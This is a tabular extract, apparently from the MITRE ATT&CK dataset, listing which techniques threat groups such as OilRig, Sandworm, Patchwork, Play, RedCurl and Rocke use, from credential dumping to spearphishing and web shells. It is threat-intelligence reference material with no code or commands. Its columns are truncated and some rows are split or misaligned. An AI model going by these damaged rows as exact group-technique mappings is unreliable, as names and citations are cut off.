G0133 Nomadic Ointrusion- group uses T1059.001PowerShellattack-pat technique [Nomadic O
G0133 Nomadic Ointrusion- group uses T1566.001Spearphishattack-pat technique [Nomadic O
G0133 Nomadic Ointrusion- group uses T1059.003Windows Cattack-pat technique [Nomadic O
G0049 OilRig intrusion- group uses T1573.002Asymmetricattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1119 Automatedattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1110 Brute Forc attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1003.005Cached Dom attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1059 Command attack-pat
an technique [OilRig](ht
G0049 OilRig intrusion- group uses T1218.001Compiled Hattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1552.001Credentialsattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1555 Credential attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1555.003Credential attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1071.004DNS attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1140 Deobfuscatattack-pat technique A [OilRig](
G0049 OilRig intrusion- group uses T1087.002Domain Acattack-pat technique [OilRig](h
G0049 OilRig intrusion- group uses T1069.002Domain Grattack-pat technique [OilRig](h
G0049 OilRig intrusion- group uses T1027.013Encrypted/attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1048.003Exfiltrati attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1133 External R attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1008 Fallback C attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1070.004File Deleti attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1027.005Indicator attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1105 Ingress Tooattack-pat technique [OilRig](ht
[OilRig](https://attack.mitre.o
G0049 OilRig intrusion- group uses T1056.001Keyloggingattack-pat technique
G0049 OilRig intrusion- group uses T1003.004LSA Secret attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1003.001LSASS Memattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1087.001Local Acco attack-pat technique [OilRig](h
G0049 OilRig intrusion- group uses T1069.001Local Grouattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1204.002Malicious Fattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1204.001Malicious Lattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1036 Masqueradattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1046 Network Seattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1137.004Outlook H attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1201 Password Pattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1120 Peripheral attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1059.001PowerShellattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1057 Process Di attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1572 Protocol T attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1012 Query Regiattack-pat technique [OilRig](h
G0049 OilRig intrusion- group uses T1021.001Remote Des attack-pat technique [OilRig](h
G0049 OilRig intrusion- group uses T1021.004SSH attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1053.005Scheduled attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1113 Screen Capattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1566.001Spearphishattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1566.002Spearphishattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1566.003Spearphishiattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1497.001System Cheattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1082 System Inf attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1016 System Netattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1049 System Netattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1033 System Own attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1007 System Serattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1078 Valid Acco attack-pat technique [OilRig](h
G0049 OilRig intrusion- group uses T1059.005Visual Basiattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1071.001Web Protocattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1505.003Web Shell attack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1059.003Windows Cattack-pat technique [OilRig](ht
G0049 OilRig intrusion- group uses T1555.004Windows Cattack-pat technique [OilRig](h
G0049 OilRig intrusion- group uses T1047 Windows M attack-pat technique [OilRig](h
G0071 Orangewo intrusion- group uses T1021.002SMB/Windo attack-pat technique [Orangewor
G0071 Orangewo intrusion- group uses T1071.001Web Protocattack-pat technique [Orangewor
G0068 PLATINUMintrusion- group uses T1056.004Credential attack-pat technique [PLATINUM](
G0068 PLATINUMintrusion- group uses T1189 Drive-by C attack-pat technique [PLATINUM]
G0068 PLATINUMintrusion- group uses T1068 Exploitatioattack-pat technique [PLATINUM](
G0068 PLATINUMintrusion- group uses T1105 Ingress Tooattack-pat technique [PLATINUM]
G0068 PLATINUMintrusion- group uses T1056.001Keyloggingattack-pat technique [PLATINUM]
G0068 PLATINUMintrusion- group uses T1003.001LSASS Memattack-pat technique [PLATINUM]
G0068 PLATINUMintrusion- group uses T1204.002Malicious Fattack-pat technique [PLATINUM](
G0068 PLATINUMintrusion- group uses T1036 Masqueradattack-pat technique [PLATINUM]
G0068 PLATINUMintrusion- group uses T1095 Non-Applicattack-pat technique [PLATINUM]
G0068 PLATINUMintrusion- group uses T1055 Process Injattack-pat technique [PLATINUM]
G0068 PLATINUMintrusion- group uses T1566.001Spearphishattack-pat technique [PLATINUM](
G1005 POLONIUMintrusion- group uses T1102.002Bidirectio attack-pat technique [POLONIUM]
G1005 POLONIUMintrusion- group uses T1567.002Exfiltratio attack-pat technique [POLONIUM]
G1005 POLONIUMintrusion- group uses T1090 Proxy attack-pat technique [POLONIUM]
G1005 POLONIUMintrusion- group uses T1588.002Tool attack-pat technique [POLONIUM]
G1005 POLONIUMintrusion- group uses T1199 Trusted Relattack-pat technique [POLONIUM]
G1005 POLONIUMintrusion- group uses T1078 Valid Acco attack-pat technique [POLONIUM]
G1005 POLONIUMintrusion- group uses T1583.006Web Servicattack-pat technique [POLONIUM]
G0056 PROMETHIintrusion- group uses T1553.002Code Signi attack-pat technique [PROMETHIUM
G0056 PROMETHIintrusion- group uses T1587.002Code Signinattack-pat technique [PROMETHIUM
G0056 PROMETHIintrusion- group uses T1587.003Digital Certattack-pat technique [PROMETHIUM
G0056 PROMETHIintrusion- group uses T1189 Drive-by C attack-pat technique [PROMETHIUM
G0056 PROMETHIintrusion- group uses T1078.003Local Acco attack-pat technique [PROMETHIU
G0056 PROMETHIintrusion- group uses T1204.002Malicious Fattack-pat technique [PROMETHIUM
G0056 PROMETHIintrusion- group uses T1036.004Masquerade attack-pat technique [PROMETHIU
G0056 PROMETHIintrusion- group uses T1036.005Match Legiattack-pat technique [PROMETHIUM
G0056 PROMETHIintrusion- group uses T1205.001Port Knockattack-pat technique [PROMETHIUM
G0056 PROMETHIintrusion- group uses T1547.001Registry Ruattack-pat technique [PROMETHIU
G0056 PROMETHIintrusion- group uses T1543.003Windows Se attack-pat technique [PROMETHIUM
G0040 Patchworkintrusion- group uses T1560 Archive Coattack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1119 Automatedattack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1197 BITS Jobs attack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1027.001Binary Padattack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1548.002Bypass Useattack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1553.002Code Signi attack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1587.002Code Signinattack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1027.010Command aOttack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1555.003Credential attack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1574.002DLL Side-L attack-pat technique A [Patchwo
G0040 Patchworkintrusion- group uses T1005 Data from attack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1102.001Dead Dropattack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1189 Drive-by C attack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1559.002Dynamic Daattack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1203 Exploitatioattack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1070.004File Deleti attack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1083 File and Di attack-pat technique A [Patchwor
G0040 Patchworkintrusion- group uses T1027.005Indicator attack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1105 Ingress Tooattack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1074.001Local Data attack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1204.002Malicious Fattack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1204.001Malicious Lattack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1036.005Match Legiattack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1112 Modify Regattack-pat technique A [Patchwor
G0040 Patchworkintrusion- group uses T1059.001PowerShellattack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1055.012Process Hoattack-pat technique A [Patchwor
G0040 Patchworkintrusion- group uses T1547.001Registry Ruattack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1021.001Remote Des attack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1053.005Scheduled attack-pat technique A [Patchwor
G0040 Patchworkintrusion- group uses T1518.001Security S attack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1027.002Software Pattack-pat technique A [Patchwo
G0040 Patchworkintrusion- group uses T1566.001Spearphishattack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1566.002Spearphishattack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1598.003Spearphishattack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1132.001Standard Eattack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1082 System Inf attack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1033 System Own attack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1588.002Tool attack-pat technique [Patchwork
G0040 Patchworkintrusion- group uses T1059.005Visual Basiattack-pat technique [Patchwork]
G0040 Patchworkintrusion- group uses T1059.003Windows Cattack-pat technique [Patchwork]
G0011 PittyTiger intrusion- group uses T1588.002Tool attack-pat technique [PittyTiger
G0011 PittyTiger intrusion- group uses T1078 Valid Acco attack-pat technique [PittyTiger
G1040 Play intrusion- group uses T1560.001Archive viaattack-pat technique [Play](https://attack.mitre.or
G1040 Play intrusion- group uses T1070.001Clear Windattack-pat technique [Play](http
G1040 Play intrusion- group uses T1027.010Command aOttack-pat technique [Play](http
G1040 Play intrusion- group uses T1030 Data Transfattack-pat technique [Play](http
[Play](https://attack.mitre.or
G1040 Play intrusion- group uses T1562.001Disable or attack-pat technique
G1040 Play intrusion- group uses T1078.002Domain Acattack-pat technique [Play](http
G1040 Play intrusion- group uses T1048 Exfiltratio attack-pat technique [Play](http
G1040 Play intrusion- group uses T1190 Exploit Pubattack-pat technique [Play](htt
G1040 Play intrusion- group uses T1133 External R attack-pat technique [Play](https://attack.mitre.or
G1040 Play intrusion- group uses T1070.004File Deleti attack-pat technique [Play](http
G1040 Play intrusion- group uses T1083 File and Di attack-pat technique [Play](http
G1040 Play intrusion- group uses T1657 Financial Tattack-pat technique [Play](htt
G1040 Play intrusion- group uses T1105 Ingress Tooattack-pat technique [Play](http
G1040 Play intrusion- group uses T1003.001LSASS Memattack-pat technique [Play](htt
G1040 Play intrusion- group uses T1078.003Local Acco attack-pat technique [Play](http
G1040 Play intrusion- group uses T1587.001Malware attack-pat technique [Play](htt
G1040 Play intrusion- group uses T1059.001PowerShellattack-pat technique [Play](http
G1040 Play intrusion- group uses T1057 Process Di attack-pat technique [Play](https://attack.mitre.or
G1040 Play intrusion- group uses T1018 Remote Sysattack-pat technique [Play](htt
G1040 Play intrusion- group uses T1021.002SMB/Windo attack-pat technique [Play](http
[Play](https://attack.mitre.or
G1040 Play intrusion- group uses T1518.001Security S attack-pat technique
G1040 Play intrusion- group uses T1082 System Inf attack-pat technique [Play](https://attack.mitre.or
[Play](https://attack.mitre.or
G1040 Play intrusion- group uses T1016 System Netattack-pat technique
G1040 Play intrusion- group uses T1588.002Tool attack-pat technique [Play](htt
G1040 Play intrusion- group uses T1078 Valid Acco attack-pat technique [Play](http
G1040 Play intrusion- group uses T1059.003Windows Cattack-pat technique [Play](https://attack.mitre.or
G0033 Poseidon intrusion- group uses T1087.002Domain Acattack-pat technique [Poseidon
G0033 Poseidon intrusion- group uses T1087.001Local Acco attack-pat technique [Poseidon
G0033 Poseidon intrusion- group uses T1036.005Match Legiattack-pat technique [Poseidon G
G0033 Poseidon intrusion- group uses T1003 OS Credentattack-pat technique [Poseidon G
G0033 Poseidon intrusion- group uses T1059.001PowerShellattack-pat technique The [Posei
G0033 Poseidon intrusion- group uses T1057 Process Di attack-pat technique After compr
G0033 Poseidon intrusion- group uses T1049 System Netattack-pat technique [Poseidon
G0033 Poseidon intrusion- group uses T1007 System Serattack-pat technique After compr
G0024 Putter Pan intrusion- group uses T1562.001Disable or attack-pat technique Malware us
G0024 Putter Pan intrusion- group uses T1055.001Dynamic-linattack-pat technique An executab
G0024 Putter Pan intrusion- group uses T1027.013Encrypted/attack-pat technique Droppers us
G0024 Putter Pan intrusion- group uses T1547.001Registry Ruattack-pat technique A dropper
G0048 RTM intrusion- group uses T1574.001DLL Searchattack-pat technique [RTM](http
G0048 RTM intrusion- group uses T1102.001Dead Dropattack-pat technique [RTM](https
G0048 RTM intrusion- group uses T1189 Drive-by C attack-pat technique [RTM](http
G0048 RTM intrusion- group uses T1204.002Malicious Fattack-pat technique [RTM](http
G0048 RTM intrusion- group uses T1547.001Registry Ruattack-pat technique [RTM](https
G0048 RTM intrusion- group uses T1219 Remote Accattack-pat technique [RTM](http
G0048 RTM intrusion- group uses T1566.001Spearphishattack-pat technique [RTM](http
G0075 Rancor intrusion- group uses T1105 Ingress Tooattack-pat technique [Rancor](ht
G0075 Rancor intrusion- group uses T1204.002Malicious Fattack-pat technique [Rancor](ht
G0075 Rancor intrusion- group uses T1218.007Msiexec attack-pat technique [Rancor](h
G0075 Rancor intrusion- group uses T1053.005Scheduled attack-pat technique [Rancor](h
G0075 Rancor intrusion- group uses T1566.001Spearphishattack-pat technique [Rancor](ht
G0075 Rancor intrusion- group uses T1059.005Visual Basiattack-pat technique [Rancor](ht
G0075 Rancor intrusion- group uses T1071.001Web Protocattack-pat technique [Rancor](ht
G0075 Rancor intrusion- group uses T1059.003Windows Cattack-pat technique [Rancor](h
G0075 Rancor intrusion- group uses T1546.003Windows Ma attack-pat technique [Rancor](h
G1039 RedCurl intrusion- group uses T1560.001Archive viaattack-pat technique [RedCurl](
G1039 RedCurl intrusion- group uses T1573.002Asymmetricattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1119 Automatedattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1020 Automatedattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1552.001Credentialsattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1555.003Credential attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1552.002Credentialsattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1005 Data from attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1039 Data from attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1087.002Domain Acattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1087.003Email Accoattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1070.004File Deleti attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1083 File and Di attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1056.002GUI Input attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1564.001Hidden Fileattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1202 Indirect C attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1003.001LSASS Memattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1087.001Local Acco attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1114.001Local Emailattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1204.002Malicious Fattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1204.001Malicious Lattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1587.001Malware attack-pat technique [RedCurl](h
[RedCurl](https://attack.mitr
G1039 RedCurl intrusion- group uses T1036.005Match Legiattack-pat technique `MdMMaintenenceTask` to m
G1039 RedCurl intrusion- group uses T1046 Network Seattack-pat technique [RedCurl](h
[RedCurl](https://attack.mitr
G1039 RedCurl intrusion- group uses T1027 Obfuscatedattack-pat technique
G1039 RedCurl intrusion- group uses T1059.001PowerShellattack-pat technique [RedCurl](
G1039 RedCurl intrusion- group uses T1059.006Python attack-pat technique [RedCurl](
G1039 RedCurl intrusion- group uses T1547.001Registry Ruattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1218.011Rundll32 attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1053.005Scheduled attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1566.001Spearphishattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1566.002Spearphishattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1573.001Symmetric attack-pat technique [RedCurl](
G1039 RedCurl intrusion- group uses T1082 System Inf attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1080 Taint Shar attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1537 Transfer D attack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1199 Trusted Relattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1059.005Visual Basiattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1071.001Web Protocattack-pat technique [RedCurl](
G1039 RedCurl intrusion- group uses T1102 Web Servicattack-pat technique [RedCurl](h
G1039 RedCurl intrusion- group uses T1059.003Windows Cattack-pat technique [RedCurl](
G0106 Rocke intrusion- group uses T1071 Applicationattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1037 Boot or Logattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1070.002Clear Linu attack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1027.004Compile Aftattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1496.001Compute Hiattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1053.003Cron attack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1102.001Dead Dropattack-pat technique [Rocke](ht
G0106 Rocke intrusion- group uses T1140 Deobfuscatattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1562.004Disable or attack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1562.001Disable or attack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1574.006Dynamic Liattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1190 Exploit Pubattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1070.004File Deleti attack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1564.001Hidden Fileattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1105 Ingress Tooattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1222.002Linux and M attack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1036.005Match Legiattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1046 Network Seattack-pat technique [Rocke](ht
G0106 Rocke intrusion- group uses T1571 Non-Standaattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1027 Obfuscatedattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1055.002Portable Exattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1552.004Private Keyattack-pat technique [Rocke](ht
G0106 Rocke intrusion- group uses T1057 Process Di attack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1059.006Python attack-pat technique [Rocke](ht
G0106 Rocke intrusion- group uses T1547.001Registry Ruattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1018 Remote Sysattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1014 Rootkit attack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1021.004SSH attack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1518.001Security S attack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1027.002Software Pattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1082 System Inf attack-pat technique [Rocke](ht
G0106 Rocke intrusion- group uses T1543.002Systemd Seattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1070.006Timestompattack-pat technique [Rocke](htt
G0106 Rocke intrusion- group uses T1059.004Unix Shell attack-pat technique [Rocke](ht
G0106 Rocke intrusion- group uses T1071.001Web Protocattack-pat technique [Rocke](ht
G0106 Rocke intrusion- group uses T1102 Web Servicattack-pat technique [Rocke](ht
G1031 Saint Bear intrusion- group uses T1553.002Code Signi attack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1059 Command attack-pat
an technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1562.001Disable or attack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1589.002Email Addrattack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1027.013Encrypted/attack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1203 Exploitatioattack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1656 Impersonatattack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1059.007JavaScript attack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1204.002Malicious Fattack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1204.001Malicious Lattack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1112 Modify Regattack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1059.001PowerShellattack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1027.002Software Pattack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1566.001Spearphishattack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1608.001Upload Maattack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1497 Virtualiza attack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1583.006Web Servicattack-pat technique [Saint Bear
G1031 Saint Bear intrusion- group uses T1059.003Windows Cattack-pat technique [Saint Bear
G0034 Sandwormintrusion- group uses T1583 Acquire Infattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1102.002Bidirectio attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1584.005Botnet attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1591.002Business Reattack-pat technique In preparat
G0034 Sandwormintrusion- group uses T1027.010Command aOttack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1195.002Compromise attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1555.003Credential attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1485 Data Destrattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1486 Data Encryattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1213 Data from attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1005 Data from attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1140 Deobfuscatattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1561.002Disk Struc attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1087.002Domain Acattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1078.002Domain Acattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1590.001Domain Proattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1583.001Domains attack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1087.003Email Accoattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1585.002Email Accoattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1589.002Email Addrattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1589.003Employee attack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1499 Endpoint De attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1041 Exfiltratio attack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1190 Exploit Pubattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1203 Exploitatioattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1491.002External D attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1133 External R attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1070.004File Deleti attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1083 File and Di attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1105 Ingress Tooattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1490 Inhibit Sy attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1056.001Keyloggingattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1003.001LSASS Memattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1570 Lateral Tooattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1204.002Malicious Fattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1204.001Malicious Lattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1587.001Malware attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1036 Masqueradattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1036.005Match Legiattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1003.003NTDS attack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1106 Native API attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1040 Network Snattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1571 Non-Standaattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1027 Obfuscatedattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1059.001PowerShellattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1090 Proxy attack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1219 Remote Accattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1018 Remote Sysattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1218.011Rundll32 attack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1021.002SMB/Windo attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1053.005Scheduled attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1593 Search Op attack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1594 Search Vic attack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1583.004Server attack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1584.004Server attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1489 Service Stoattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1586.001Social Medattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1585.001Social Medattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1592.002Software attack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1072 Software Dattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1566.001Spearphishattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1566.002Spearphishattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1598.003Spearphishattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1132.001Standard Eattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1539 Steal Web attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1195 Supply Chaattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1082 System Inf attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1049 System Netattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1033 System Own attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1588.002Tool attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1199 Trusted Relattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1608.001Upload Maattack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1078 Valid Acco attack-pat technique [Sandworm T
